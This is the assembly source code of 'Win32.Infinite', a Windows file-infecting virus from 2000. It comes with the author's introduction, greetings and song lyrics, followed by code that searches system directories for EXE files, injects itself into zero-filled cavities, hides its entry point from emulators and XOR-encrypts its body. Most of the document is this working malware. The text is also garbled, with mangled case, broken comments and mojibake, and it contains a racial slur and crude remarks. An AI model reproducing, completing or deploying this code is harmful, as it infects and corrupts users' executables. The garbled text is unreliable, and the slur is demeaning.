;
Where can I tender and tender and tender and tender and tender?
谀苘 勰 勰 勰 勰 勰 勰 勰? [Win32.infinite Billy BelceBu / IKX]
勰 勰 圹 圹 圹 嫩 圹 圹 圹 圹 谀] 圹] 圹 圹 圹]]]]]]]]]]]]]]]]]
谀 谀 勰 勰 勰 勰 勰 勰 勰 勰 ?? [17/07/00 - Made in Valencia, Spain]
勰 勰 勰 勰 勰 勰 勰 勰 勰?
;
;
;
[Introduction]
;
Welcome to Infinite. This Virus Has Been Very For Me, AS ITS Ambient
; Of Development Was Very Odd. Well, It's My First Virus Using CAVITY TECH,
Something That I Thought That It Was More Difficult Than IT Really Was ...
I Sincerely Doubt That IT Would Work in Winnt Family (NT4, W2K), AS I Havent
Been Able to Test It There (Win2k Has Some Incompatibilities with My INCOTIN
; 3DFX VOODOO2 and My SoundCard, But I Didn't Wanded to Change That Thing of
Win32. If it doesn't, I don't care ... Blah Blah Blah, I've Returned from My
Laaaarge VX Holydays and I've Just Recessly Finished Forever and this Babe.
I Hope I Haven't Lost My Awesome Code Style (Blah, Just Kidding ... I don't
HAVE Anything Awesome Besides The size of my dick - eNormous :)
; OH, I Almost Forgot ... I'VE REALIZED That The CAVITY TECHNIQUE IS Stable
Most of the Times, But it's not perfect, and i shop do much more compro-
; BATINSBEFORE Infection Than The Already EXISTING AND on
Care: Windows Also Has Fails in its code and noone reminds it;)
IT's Not a Special Virus in Any Field, But I Wanted to Do Some CAVITY STUFF
And Here it is. Mwaha!
;
[Features]
;
; CAVITY VIRUS, Searches for Holes of Zeroes or Int 3.
; Infect Files On Current, Windows and Windows / System Directories.
; Simple & Silly 8-byte xor encryption loop
; Kinda Simple EPO with Emulator Protection
Checks for sfc protection (if it works in win2k ...); CRC32 usage (apis, extensions ...)
; It's intended to be optimized (not Too MUCH, But Enough)
;
[Greetings]
;
THIS TIME The Greets Will Go To Few PPL. From The VX Scene, To Starzer0,
Wintermute, Virusbuster, Benny, Asmodeus, Lifewire, Bumblebee, Ypsilon,
And from outside to my best friends out there.also to the people That Tries
To make this place we call World a Much Better Place. You Rule, Guyz.
;
[Infinity - The Song]
;
Mother Watch Your Children
The Iron Fist of Fear Is Ruling Our Lives
IT's not Too Late to Change The Course
WE CAN Make this World a better place to be in
;
How much more do we want unient we're satisfied?
What happens when we would what we want?
Acquiring More, Still There's Never ENOUGH
; We forget Those Who Really Co., NEED
; The end is ner, or so they say
Selling Peace with Guns
;
; Infinity - Where do we go from here?
; Infinity - Where do we go from here?
; Infinity - Where do we go?
; Infinity - Where do we go from here?
;
Guns Spitting (Out the) Message of Peace Everywhere
Is IS ITRLY THAT WE Don't Care?
See Mercenaries of Fear Selling Love
; Telling Salvation Comes from Above
Arrogance and Fear Walking Hand in Hand
WE Must See That There's Much More To Life Than this
;
Mother see your children
Make US Und To and Help US To Find The Way
The answers lie inside
; They area Locked Inside to the Vault of Truth of US
It's time to spread the word arround
; Be yourself and do what you want to do with your life
; Remember, You Get Just What You Give
You Reap all what you sow
You are in charge of your owned;
; Infinity - Where do we go from here?
; Infinity - Where do we go from here?
; Infinity - Where do we go?
; Infinity - Where do we go from here?
;
You make your own way
;
; ------------------------------------------
Infinity - [Stratovarius] - (Infinite)
;
; (c) 2000 Billy BelceBu / IKX [http://beautifulpeople.cjb.net]
屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯
;? Win32.infinite (c) 2000 BILLY BELCEBU / IKX?
Denu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun.
INCLUDE HOST.INC; SOME NICE INCLUDES
INCLUDE Infinite.inc
Virseg segment dword use32 public 'infinite'
Virus_Start:
屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯
;? Virus code?
Denu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun.
Infinite:
Push Eax; Make Some Space On Stack
Pushhad
Call Decrypt
Encrypt_start = $
Call Get_Delta
Call setseh; set we new protection frame
MOV ESP, [ESP 08H]
Call Get_Delta
JMP Restoreseh
Setseh:
XOR EDX, EDX
Push DWORD PTR FS: [EDX]
MOV DWORD PTR FS: [EDX], ESP
Push 05H; ECX is The Limit of Pages
POP ECX
Mov ESI, EBP; We Put A Page Inside Our Code
Call CheckImageBase; Get Our Own Image Base
MOV DWORD PTR [EBP MODBASE-DELTA], ESI
Push 05h; 50 Pages TO SCAN
POP ECX
MOV ESI, [ESP 2CH]; Put the Candidate to Kernel
Call CheckImageBase; Scan Backwards for IT
MOV DWORD PTR [EBP KERNEL-DELTA], ESI
Lea Eax, [EBP API_LIST-DELTA]; Let's Detect All The Needed
XCHG EAX, ESI; API :)
Lea EDI, [EBP API_ADDRESSES-DELTA]
Call getapis
Virus is now Initialized, Let's Search for Objectives.
Lea EDI, [EBP CURRENT_DIR-DELTA]; Save Current Directory To
Push EDI; A TEMP VARIABLE
Push 7fh
Apicall getCurrentDirectorya
Lea EDI, [EBP Infect_Dir-Delta] Push 7FH
Push EDI
Apicall getWindowsDirectorya
Call setDir & infect
Lea Edi, [EBP Infect_Dir-Delta]
Push 7fh
Push EDI
Apicall GetsystemDirectorya
Call setDir & infect
Lea Edi, [EBP CURRENT_DIR-DELTA]
Push EDI
Apicall setCurrentDirectorya
Call seek & infect
Now Let's unprotect The Memory Where The EPO BYTES WILL BE Restore
Call hh & l; hunting high & low :)
DQ?
HH & L: Push 04H; Page_Readwrite
Push EPO_BYTES
MOV EAX, DWORD PTR [EBP RETHOST-DELTA]
Add Eax, DWORD PTR [EBP MODBASE-DELTA]
Push EAX
Apicall VirtualProtect
Now it's time to go away;)
RESTORESEH:
XOR Edx, EDX; Restore Toriginal SEH
POP DWORD PTR FS: [EDX]
POP EDX
MOV EDI, (Offset Host-400000H)
Rethost EQU $ -4
Add EDI, 12345678H
Modbase EQU $ -4
MOV [ESP.20H], EDI
Call Over0
SEBES DB EPO_BYTES DUP (90H)
OVER0: POP ESI
Push EPO_BYTES
POP ECX
REP MOVSB
Popad
RET
屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯
Mark Of the Virus?
Denu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun.
DB 0, "Win32.infinite (C) 2000 Billy BelceBu / Ikx", 0
屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯
;? Search for files to infect?
Denu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun.
SetDir & Infect:
Lea EDI, DWORD PTR [EBP Infect_Dir-Delta]
Push EDI
Apicall setCurrentDirectorya
Seek & Infect:
Lea EAX, [EBP WFD-Delta]; Search for Files
Push EAX
Call over3
DB "*. *", 0; Search for All Files
OVER3: APICALL FINDFIRSTFILEA
MOV DWORD PTR [EBP SearchHandle-Delta], EAX
INC EAX
JZ Failoccured
SearchFormore:
Push DWORD PTR [EBP MODBASE-DELTA]; Preserve UnTouchable Info
Push DWORD PTR [EBP RETHOST-DELTA]
Lea EDI, [(EBP.WFD.SZFILENAME) - DELTA]; Is The File Found FactiblePush EDI; of Being Infected?
Call Processextension
POP EDI
JECXZ NOTTHISTIME; NOPES.
Call infectpe
NOTTHISTIME:
POP DWORD PTR [EBP RETHOST-DELTA]; restore this intending
POP DWORD PTR [EBP MODBASE-DELTA]; Info
Lea EDI, [(ebp.wfd.szfilename) - Delta]; Fill this with zeroes
Mov ECX, 260
XOR Al, Al
Rep Stosb
Lea Eax, [ebp.wfd-delta]; search for more little Little
Push Eax; SUCKERS
Push DWORD PTR [EBP SEARCHHANDLE-DELTA]
Apicall FindnextFilea
OR EAX, EAX
JNZ SearchFormore
ClosesearchHandle:
Push DWORD PTR [EBP SEARCHHANDLE-DELTA]
Apicall FindClose
Failoccured:
RET
Processextension:
Input:
EDI - Pointer to File Name
Output:
; ECX - NULL IT IT IS NOT AN EXTENSITION; 1 IF IS.
XOR Al, Al; Search for Null
Scasb
JNZ $ -1
Lea ESI, [EDI-5]; Get the EXTENSITION :)
Push 05h; size to calculate CRC32
POP EDI
OR DWORD PTR [ESI], 20202020H; make Locase the leWsers
Call CRC32
CMP EAX, 0F643C743H; ONLY EXE Files
JZ ITWaseXtension
Dec edx
ITWaseXtension:
Inc EDX
MOV ECX, EDX
RET
屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯
:? Pe infection engine?
Denu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun.
Infectpe:
Input:
EDI - Pointer to FileName to Infect
Output:
Nothing.
CMP DWORD PTR [EBP SFCISFILEPROTECTED-DELTA], 00H
JZ Notinwin2k
Push EDI; WIN2K ABILITY: IT HAS Feature
Push 00h; That Warns the user if AN
Apicall sfcisfileprotected; important file is being
Modified. if The File HAS
OR EAX, Eax; Such Protection, We Won't
JNZ EXITINFECTPE; TOUCH IT, OK?;)
Notinwin2k:
Push 80h; Destroy Hostile Attributes
Push EDI; and PUT NORMAL AONES
Apicall setFileAttributesa
XOR EAX, EAX; Open File for r / w
Push Eaxpush EAX
Push 03h; Open_EXISTING FLAG
Push EAX
INC EAX
Push EAX
PUSH 0C0000000H; Read / Write
Push EDI
Apicall Createfilea
INC EAX
JZ EXITINFECTPE
Dec EAX
MOV DWORD PTR [EBP FileHandle-Delta], EAX
Save Handle of Opened File
Push EAX
Push 00h
Push EAX
Apicall getFileSize; Get ITS Size
MOV DWORD PTR [EBP Originalsize-Delta], EAX
POP ECX; ECX = Handle
XOR EBX, EBX; EBX = 0
Push EBX
Push 00h; push size
Push EBX
Push 04h
Push EBX
Push Ecx; Push Handle
Apicall CreateFilemappingA
OR EAX, EAX
JZ ClosefileExitinfectpe
MOV DWORD PTR [EBP MAPHANDLE-DELTA], EAX
XOR EBX, EBX
Push 00h; WE WANT MAP ONLY FILE SIZE
Push EBX
Push EBX
Push 02h
Push EAX
Apicall MapViewOffile
OR EAX, EAX
JZ Unmap & Closemap & FileExitinfectpe
MOV DWORD PTR [EBP MAPADDRESS-DELTA], EAX
Mov ESI, [EAX 3CH]; ptr to pehader =]
Add ESI, ESI
MOV DWORD PTR [EBP PTREH-DELTA], ESI
CMP Word PTR [ESI], "EP"; Check for PE Mark
JNZ Trunc & Unmap & Closemap & FileExitinfectpe
CMP DWORD PTR [ESI.MAGICIINFECTION], INF_MARK
JZ Trunc & Unmap & Closemap & FileExitinfectpe; Check for Previous Infection
CMP Word Ptr [ESI Machine], 014CH
JNZ Trunc & Unmap & Closemap & FileExitinfectpe; Check for i386;)
Cmp DWORD PTR [EBP.WFD.NFILESIZEHIGH-DELTA], 00H
JNE Trunc & Unmap & Closemap & FileExitinfectpe; Do n'tALLOW HUGE & UGLY Files
CMP DWORD PTR [EBP.WFD.NFILESZELOW-DELTA], 4000H
JB Trunc & Unmap & Closemap & FileExitinfectpe; Do n'tALLOW TO LITTLE FILES
MOV Eax, [ESI.EntryPointRva]; EAX = Old File's EIP
Mov DWORD PTR [EBP RETHOST-DELTA], EAX
Mov EDI, ESI
Add ESI, 0F8H-28H; Pointer to 1st Section-28h
Nigger: Add ESI, 28H; Ptr to Section Name;) MOV EDX, Eax; PUT IN EDX THE Original EIP
Sub Edx, [ESI.VIRTUALADDRESS]; Remove The VirtualAddress
CMP EDX, [ESI.VIRTUALSIZE]; Is Eip Pointing to this sec?
Jae Nigger; if not, loop again
MOV EBX, DWORD PTR [EBP MAPADDRESS-DELTA]
Pushhad
Push dword ptr [esi.sizeofrawdata]; Some tricky think :)
Pop DWORD PTR [ESI.VIRTUALSIZE]
MOV EAX, [EBP RETHOST-DELTA]
Add Eax, EBX
MOV DWORD PTR [EBP TEMPSHIT-DELTA], EAX
Popad
Add ebx, [esi.ptrtorawdata]
Add Edx, EBX
MOV ESI, EDX; ESI - Pointer to Section
MOV DWORD PTR [EBP EPOFS-DELTA], ESI; Mapped in Mem Where Da EP IS.
MOV EBX, DWORD PTR [EBP OriginalSize-Delta]; Search Limit
MOV ECX, HEAP_END-VIRUS_START Security; How Many Space Do WE NEED
Call seekforholes
JC Therewasnohole
Pushhad
Sub Eax, DWORD PTR [EBP MAPADDRESS-DELTA]
MOV ESI, DWORD PTR [EBP PTREH-DELTA]
Mov Edi, ESI; We Wanna Put Some Attribs
Add ESI, 0F8H-28H; to the section where the
Niggr2: add esi, 28h; Virus Code Is Located, SO
Mov Edx, Eax; We've To Search for IT :)
Sub Edx, [ESI.VIRTUALADDRESS]
CMP EDX, [ESI.VIRTUALSIZE]
Jae Niggr2
EAX = Ptr to Hole
MOV DWORD PTR [EBP INF_SWITCH-DELTA], 00H
Leet's Check if We Can Put Ourslves Inside the Hole (more security)
Mov Edx, [ESI.VIRTUALADDRESS]
Add Edx, [ESI.VIRTUALSIZE]
Add Eax, ((Heap_end-Virus_Start Security)
Sub EDX, EAX
JS WecantinfectThere
MOV DWORD PTR [EBP INF_SWITCH-DELTA], 01H
OR [ESI.CHARACTERISTICS], 0A0000020H; PUT IT SUCKA!
Wecantinfectthere:
Popad
MOV ECX, 12345678H
Org $ -4
INF_SWITCH DD?
OR ECX, ECX
JZ Trunc & Unmap & Closemap & FileExitinfectpe
Lea ESI, [EBP VIRUS_START-DELTA]
Mov Edi, EAX
Add Edi, Security; Some Security:) Pushhad
Mov Eax, 12345678h; Let's Calculate Where The
Tempshit = $ -4; JMP Must Point To
Add Eax, (KilleMu-EPO)
Sub EDI, EAX
MOV DWORD PTR [EBP JMPADD-DELTA], EDI
Popad
MOV ECX, Virus_Size
REP MOVSB
ENCRYPT WITH A SILLY L00P
Pushhad
SUB EDI, Virus_END-Encrypt_Start
MOV ESI, EDI
Call Random
MOV BL, Al
MOV BYTE PTR [EDI ENC_KEY-Encrypt_Start], BL
MOV BYTE PTR [EBP ENC_K3Y-DELTA], BL
MOV ECX, Encrypt_END-Encrypt_Start
ENC_L00P:
Lodsb
XOR Al, BL
Stosb
LOOP ENC_L00P
Popad
Pushhad
Sub EDI, (Virus_Size- (Sebes-Virus_Start)
MOV ESI, DWORD PTR [EBP EPOFS-DELTA]
Push EPO_BYTES
POP ECX
Pushhad
Lewpit:
Lodsb; Store EPO BYTES ALSO
XOR Al, 00h; Encrypted
ENC_K3Y = $ -1
Stosb
Loop Lewpit
Popad
XCHG EDI, ESI
Call over69
Where is Xiyomy? Where is Xomiomo know?
EPO: CALL KILLEMU;? This Code Will Give The Control to The Control To
MOV ESP, [ESP 08H];? Virus and Avoid The Scanning of Emulators
XOR EDX, EDX;? At the Same Time :)
POP DWORD PTR FS: [EDX];?
POP EDX;?
DB 0E9H;?
JMPADD: DD?;?
KilleMU: XOR EDX, EDX;?
Push DWORD PTR FS: [EDX];?
MOV FS: [EDX], ESP;?
Div EDX;?
EPO_BYTES = $ -EPO;?
Where is Xiyomy? Where is Xomiomo know?
OVER69: POP ESI
REP MOVSB
Popad
MOV ESI, DWORD PTR [EBP PTREH-DELTA]
MOV DWORD PTR [ESI.MAGICICINFECTION], INF_MARK; PUT INF.MARK
FIX CHECKSUM IF NEEDED
Add ESI, 58H
CMP DWORD PTR [ESI], 00H
JZ Trunc & Unmap & Closemap & FileExitinfectpe
Push ESI; POINTER TO CHECKSUM FIELD
Call N4T4S
DD?; WHERE Store Old CHECKSUM
N4T4S: Push DWORD PTR [EBP OriginalSize-Delta]
Push DWORD PTR [EBP MAPADDRESS-DELTA]
Apicall ChecksummappedFile
Therewasnohole:
Trunc & Unmap & Closemap & FileExitinfectpe:
UNMAP & Closemap & FileExitinfectpe: Push DWORD PTR [EBP MAPADDRESS-DELTA]
Apicall unmapViewoffile
Closemap & FileExitinfectpe:
Push DWORD PTR [EBP MAPHANDLE-DELTA]
Apicall CloseHandle
ClosefileExitinfectpe:
Push DWORD PTR [EBP FILEHANDLE-DELTA]
Apicall CloseHandle
ExitInfectpe:
RET
Seekforholes:
Input:
ESI - Pointer Inside File (in pehader)
; ECX - How Many Space Do We NEED
EBX - SEARCH LIMIT
Output:
Eax - Pointer to the beginning of the shit
; Cf - set if Error (COULDN't Find Hole)
Call setseh1
MOV ESP, [ESP 08H]; Just for Security of
Call get_delta; scanning :)
JMP NSE_
Setseh1:
XOR EDX, EDX
Push DWORD PTR FS: [EDX]
MOV DWORD PTR FS: [EDX], ESP
PUSH ESI
GetAnotherbyte:
XOR EDX, EDX; Clear Counter :)
Gab2: Dec Ebx; Check IF WE ARIVED Until
JZ Noshitenough; THE LIMIT (Run Away IF SO)
Lodsb
OR Al, Al; NULL BYTE?
JZ isfillbyte
CMP AL, 0CCH; INT 3? (VC6 Filez're Full
Jnz GetAnotherbyTe; of them
IsFillbyte:
Inc EDX; Increase Counter
CMP ECX, EDX
JNZ Gab2
WeFoundManyShit:
SUB ESI, ECX; ESI = Point To Shit
XCHG Eax, ESI
POP ESI
POP DWORD PTR FS: [00h]
POP EDX
RET
Noshitenough:
POP ESI
NSE_: STC
POP DWORD PTR FS: [00h]
POP EDX
RET
屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯
APICRC32 SEARCH ENGINE?
Denu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun.
GetApis Proc
Input:
Eax - Base Address of the Library Where Search The Apis
ESI - Pointer to an array of crc32 of the apis we want to search
EDI - POINTER TO WHERE Store The Apis
Output:
Nothing.
Push Eax; Eax = Handle of Module
POP DWORD PTR [EBP TMPMODULEBASE-DELTA]
APIS33K:
Lodsd; Get in Eax The CRC32 OF API
Push ESI EDI
Call getapi_et_crc32
POP EDI ESI
Stosd; Save In [edi] The API AddressCMP Byte Ptr [ESI], 0BBH; There More Apis in this
JNZ APIS33K; Library
Inc ESI; Check if it's the last of
CMP Byte PTR [ESI], ""; All them
JZ Endofapisearch
Push ESI; ESI Points now to the Asciz
Apicall LoadLibraryA; String of a Library ... WE
Need to load it!
Push EAX
NXTCHR: LODSB; REACH THE End of the lib
Test Al, Al; ASCIZ Name
JNZ NXTCHR
POP EAX
JMP Getapis
ENDOFAPISECH:
RET
GetApis Endp
GetAPi_ET_CRC32 Proc
Input:
EAX - CRC32 of the API WE Want to Know ITS Address
Output:
EAX - API Address, NULL IF Error
XOR EDX, EDX
Pushhad
Call over_apicrc32_seh
MOV ESP, [ESP 08H]; Set Stack As Before
XOR Eax, Eax; Signalize the Error
JMP Remove_APICRC32_SEH
Over_apicrc32_seh:
Push DWORD PTR FS: [EDX]; SET New SEH FRAME
MOV DWORD PTR FS: [EDX], ESP
XCHG Eax, EDX; PUT CRC32 of Da API IN EDX
MOV DWORD PTR [EBP Counter-Delta], EAX; Clear this field :)
PUSH 3CH
POP ESI
Add ESI, [EBP TMPMODULEBASE-DELTA]; Get PE Header of Module
Lodsw
Add Eax, [EBP TMPMODULEBASE-DELTA]; NORMALIZE
Push 1ch
POP ESI
Add ESI, [EAX 78H]; Get a Pointer to ITS EDATA
Add ESI, [EBP TMPMODULEBASE-DELTA]
Lea EDI, [EBP AddResStableva-delta]; Pointer to the Address Table
Lodsd; Get AddresStable value
Add Eax, [EBP TMPMODULEBASE-DELTA]; NORMALIZE
Stosd; and store in its variable
Lodsd; Get NameTable value
Add Eax, [EBP TMPMODULEBASE-DELTA]; NORMALIZE
Push Eax; Put IT in Stack
StOSD; Store In Its Variable
Lodsd; Get OrdinalTable Value
Add Eax, [EBP TMPMODULEBASE-DELTA]; NORMALIZE
StOSD; Store
POP ESI; ESI = Nametable VA
@? _ 3: lodsd; get Pointer to an API Name
Push ESI; Save Again
Add Eax, [EBP TMPMODULEBASE-DELTA]; Normalizexchg EDI, EAX; Store PTR in Edi
MOV EBX, EDI; And in EBX
Push Edi; Save EDI
XOR Al, Al
Scasb
JNZ $ -1
POP ESI; ESI = Pointer to API Name
SUB EDI, EBX; EDI = API Name Size
Push EDX; Save API's CRC32
Call CRC32; GET ACTUAL API's CRC32
POP EDX; Restore API's CRC32
CMP EDX, EAX; Are Them Equal?
JZ @? _ 4; if Yes, WE GOT IT
POP ESI; Restore Ptr To API Name
INC DWORD PTR [EBP Counter-Delta]; and increase the counter
JMP @? _ 3; Get Another API!
@? _ 4:
POP ESI; Remove Shit from stack
Mov Eax, 12345678H; Put in Eax The Number That
Counter = $-4; The Api Occupy in List.
SHL EAX, 1; * 2 (It's an array of words)
Add Eax, [EBP OrdinalTableva-Delta]; Normalize
XCHG Eax, ESI; ESI = Ptr 2 Ordinal; EAX = 0
Lodsw; get Ordinal In AX
Cwde; Clear MSW of Eax
SHL Eax, 2; and with it we go to the
Add Eax, [EBP AddResStableva-delta]; AddresStable (Array of
XCHG ESI, EAX; DWORDS)
Lodsd; Get Address of API RVA
Add Eax, [EBP TMPMODULEBASE-DELTA]; and Normalize !! That's it!
REMOVE_APICRC32_SEH:
XOR EDX, EDX; Remove That SEH FRAME
POP DWORD PTR FS: [EDX]
POP EDX
MOV [ESP.1CH], EAX
Popad
RET
GetApi_Et_Crc32 ENDP
屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯
Subroutines?
Denu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun.
CRC32:
Input:
ESI - Pointer to the data to process
; EDI - SIZE OF SUCH DATA
Output:
EAX - CRC32 of That Data
CLD
Pushhad
XOR ECX, ECX; Optimized by me - 2 bytes
DEC ECX; Less
MOV EDX, ECX
Nextbytecrc:
XOR EAX, EAX
XOR EBX, EBX
Lodsb
XOR Al, Cl
MOV CL, CH
MOV CH, DL
MOV DL, DH
MOV DH, 8
NextbitCrc:
SHR BX, 1
RCR AX, 1
JNC NOCRC
XOR AX, 08320H
XOR bx, 0edb8h
NOCRC: DEC DHJNZ NEXTBITCRC
XOR ECX, EAX
XOR EDX, EBX
Dec Edi
Jnz nextbytecrc
Not Edx
NOT ECX
XCHG EAX, EDX
ROL Eax, 10h
MOV AX, CX
MOV [ESP.PUSHAD_EAX], EAX
Popad
RET
CheckImageBase:
Input:
ESI - Address Inside Module
ECX - LIMIT
Output:
ESI - Module Address
And ESI, 0FFFFF0000H
CMP Word PTR [ESI], "ZM"
JZ itwaskewlenough
Notcooladdress:
SUB ESI, 00010000H
Loop CheckImageBase
ITweckewlenough:
RET
Random:
Input:
Nothing.
Output:
EAX - Random Number
Apicall gettickcount
XOR Eax, 12345678H
Org $ -4
SEED DD -1
Mov DWORD PTR [EBP SEED-DELTA], EAX
RET
Let's save some bytes;)
Get_delta:
Call Delta; Get a Relative Address from
Delta: Pop Ebp; When Calculate Offsets
RET
屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯
;? Virus Data?
Denu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun.
API_LIST = $
DB "kernel32", 0; don't need
@VirtualProtect DD 079C3D4BBH
@Findfirstfilea DD 0AE17EBEFH
@FindNextFilea DD 0AA700106H
@FindClose DD 0C200BE21H
@Createfilea DD 08C892DDFH
@SetFileAttributesa DD 03C19E536H
@Closehandle dd 068624a9dh
@Getcurrentdirectorya DD 0eBC6C18BH
@SetcurrentDirectorya DD 0B2DBD7DCH
@Geetwindowsdirectorya DD 0FE248274H
@Getsystemdirectorya DD 0593AE7CEH
@Createfilemappinga DD 096B2D96CH
@MapViewoffile DD 0797B49ECH
@Unmapviewoffile dd 094524b42h
@SetenDoffile dd 059994ed6h
@Geetfilesize dd 0ef7d811bh
@SetFilePointer DD 085859D42H
@GetsystemTIME DD 075B7EBE8H
@LoadLibrarya DD 04134D1ADH
@Freelibrary DD 0AFDF191FH
@Globalallloc DD 083A353C3H
@Globalfree DD 05CDF6B6AH
@WriteFile DD 021777793H
@GetProcaddress DD 0FFC97C1FH
@Gettickcount dd 0613fd7bahdb 0bbh
DB "imagehlp", 0
@ChecksummappedFile DD 078B31744H
DB 0BBH
DB "sfc", 0
@Sfcisfileprotected DD 06DE8F7ABH
DB 0BBH
; That's the end, my friends ...
DB ""
ENCRYPT_END = $
屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯
;? Simple Decryption L00p :)?
Denu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun.
Decrypt:
POP ESI
Mov EDI, ESI
MOV ECX, Encrypt_END-Encrypt_Start
MOV BL, 00H
ENC_KEY = $ -1
Dec_l00p:
Lodsb
XOR Al, BL
Stosb
LOOP DEC_L00P
JMP Encrypt_Start
Virus_end = $
屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯
?? Virus data in the heap?
Denu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun.
KERNEL DD?
TMPMODULEBASE DD?
AddResSTableva DD?
NameTableva DD?
OrdinalTableva DD?
OriginalSize DD?
SearchHandle DD?
FILEHANDLE DD?
Maphandle DD?
MapAddress DD?
PTRPEH DD?
EPOFS DD?
API_ADDRESS = $
; Kernel32 APIS
VirtualProtect DD?
FindFirstFilea DD?
FINDNEXTFILEA DD?
FindClose DD?
CREATEFILEA DD?
SETFILEATTRIBUTESA DD?
CloseHandle DD?
GetCurrentDirectorya DD?
SETCURRENTDIRECTORYA DD?
GetWindowsDirectorya DD?
GetSystemDirectorya DD?
CREATEFILEMAPPINGA DD?
MapViewOffile DD?
UnmapViewoffile dd?
Setndoffile dd?
GetFiLesize DD?
SETFILEPOINTER DD?
GetSystemTime DD?
LoadLibrarya DD?
FREELIBRARY DD?
GLOBALLOC DD?
GLOBALFREE DD?
Writefile DD?
GetProcAddress DD?
GetTickCount DD?
; ImageHLP APIS
Checksummappedfile DD?
SFC APIS
SFCISFILEPROTECTED DD?
Other DataS
WFD WIN32_FIND_DATA
INFECT_DIR DB 7FH DUP (?)
Current_dir DB 7fh DUP (?)
HEAP_END = $
Virseg Ends
End Infinite
; ------------------------------ [Infinite.inc] -------------- ----------------;
*********************************************************** **************************; ** this is the include file for the constant and macros of the virus **
*********************************************************** ***********************************
Constants
Virus_size = virus_end-virus_start
Total_size = HEAP_END-VIRUS_START
INF_MARK = "aiag"
Security = 20d; Very Important
Pushhad_edi = 00H
Pushad_esi = 04h
Pushad_ebp = 08h
Pushad_esp = 0ch
Pushhad_ebx = 10h
Pushad_edx = 14h
Pushhad_ecx = 18h
Pushhad_eax = 1ch
Some Pe Header Stuff
Magicpe = 00H
Machine = 04h
Numberofsections = 06h
EntryPoinTrva = 28h
CODERVA = 2ch
FileAlignment = 3ch
MagicinFection = 4ch
SizeOfimage = 50h
Checksum = 58h
PECHARACTERISTICS = 5EH
Direntryreloc = 0A0h
Some section header Fields
Sectionname = 00H
Virtualsize = 08h
VirtualAddress = 0ch
SizeOfrawData = 10h
PTRTOrawData = 14h
PTRTORELOC = 18h
Numofreloc = 20h
Characteristics = 24h
Macros
Apicall Macro API2CALL
Call DWORD PTR [EBP API2CALL-DELTA]
ENDM
Structures
Win32_find_data struct
DWFileAttributes DD?
FTCREATIONTIME DQ?
FTLASTACCESSTIME DQ?
FTLASTWRITETIME DQ?
NFILESIZEHIGH DD?
NFILESZELOW DD?
DWRESERVED0 DD?
DWRESERVED1 DD?
SZFILENAME DB 260 DUP (?)
SzalternateFileName DB 13 DUP (?)
DB 03 DUP (?)
WIN32_FIND_DATA ENDS
; ------------------------------- [Host.inc] ------------- -------------------;
*********************************************************** ***********************************
; ** this is the host for the first generation **
*********************************************************** ***********************************
.586p
.MODEL FLAT, STDCALLEXTRN Messageboxa: Proc
EXTRN EXITPROCESS: PROC
_Data segment dword use32 public 'data'
SZTTL DB "Win32.infinite", 0
SZMSG DB "Size"
DB Virus_size / 1000 MOD 10 "0"
DB Virus_size / 0100 Mod 10 "0"
DB Virus_size / 0010 MOD 10 "0"
DB Virus_size / 0001 MOD 10 "0"
DB "-"
DB "Virtual"
DB TOTAL_SIZE / 1000 MOD 10 "0"
DB TOTAL_SIZE / 0100 MOD 10 "0"
DB TOTAL_SIZE / 0010 MOD 10 "0"
DB TOTAL_SIZE / 0001 MOD 10 "0"
DB 10, "(C) 2000 Billy BelceBu / IKX", 0
_Data Ends
_Text Segment DWORD USE32 PUBLIC 'CODE'
Virus_init proc
JMP Virus_Start
Host:
DB EPO_BYTES DUP (90H)
Call Messageboxa, 0, Offset Szmsg, Offset Szttl, 0
Call EXITPROCESS, 0
Virus_init ENDP
_Text Ends
